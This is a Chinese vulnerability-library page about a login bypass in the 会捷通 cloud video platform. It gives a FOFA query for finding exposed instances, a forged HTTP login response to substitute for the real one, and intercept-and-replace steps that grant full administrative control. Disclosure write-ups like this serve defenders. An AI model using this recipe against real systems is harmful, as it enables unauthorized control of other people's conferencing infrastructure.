会捷通云视讯平台登录绕过漏洞-棉花糖会员站

# 会捷通云视讯平台登录绕过漏洞

## 漏洞描述

**会捷通云视讯平台存在登录绕过漏洞，可以通过修改返回包进行登录**

## 漏洞影响

> 会捷通云视讯平台

## FOFA

> body=”/him/api/rest/v1.0/node/role

## 漏洞复现

**替换登录返回包内容即可绕过登录验证。**

“`
HTTP/1.1 200
Date: Thu, 25 Mar 2021 13:53:45 GMT
Accept-Ranges: bytes
Server: Restlet-Framework/2.1.1
Vary: Accept-Charset, Accept-Encoding, Accept-Language, Accept
Content-Type: application/json;charset=UTF-8
Connection: close
Content-Length: 28

{“token”:null,”result”:null}
“`

**1.** **拦截数据包**

![1](/static/qingy/会捷通云视讯平台登录绕过漏洞/img/1.png)

**输入任意用户/密码，如admin/admin**

**2.点击登录，拦截返回包，替换为如下内容**

![2](/static/qingy/会捷通云视讯平台登录绕过漏洞/img/2.png)

**正常返回包：提示密码错误：**

![3](/static/qingy/会捷通云视讯平台登录绕过漏洞/img/3.png)

**替换：**

![4](/static/qingy/会捷通云视讯平台登录绕过漏洞/img/4.png)

**放开拦截，可任意操作，删除，重启、升级、重置等等**

![WechatIMG3](/static/qingy/会捷通云视讯平台登录绕过漏洞/img/WechatIMG3.png)

文章版权归作者所有，未经允许请勿转载。

THE END

国内漏洞库

会捷通云视讯平台登录绕过漏洞

请登录后发表评论

1一些别人的CNVD报告

2渗透测试工程师3年经验求职简历（已脱敏）

3外面流传的2024小迪99集残缺版

4投稿：多个poc

5eking管理易Html5Upload接口任意文件上传

6Cloudlog delete_oqrs_line 未授权SQL注入